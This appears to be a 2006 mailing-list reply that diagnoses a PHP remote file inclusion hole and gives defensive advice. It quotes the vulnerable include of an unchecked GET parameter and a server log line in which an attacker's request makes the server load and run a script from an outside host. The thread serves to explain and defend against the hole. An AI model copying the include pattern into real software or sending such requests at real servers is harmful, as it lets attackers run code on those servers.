Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Looks like that's the one. Have a look at the following line in your log file:
82.103.132.227 - - [29/Oct/2006:20:12:34
+0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt?
HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it;
rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
Your script then includes and executes the script from the URL.
How to avoid? First, follow RULE ONE (TM): Always do sanity checks on
user-supplied input.
The impact could have been avoided by setting allow_url_fopen to 0 in your
php.ini. (Unless one of your scripts really, really needs this - but think
twice before using it!)
But IMHO your approach to include files with dynamically generated paths is
not a good idea anyway. Consider a different solution like redirecting the
Browser to the resulting URL. This won't prevent the attack from being
successful, but it won't affect your server.
Best regards,
Holger
Attachment:
pgp4UIzFrtpd9.pgp
Description: PGP signature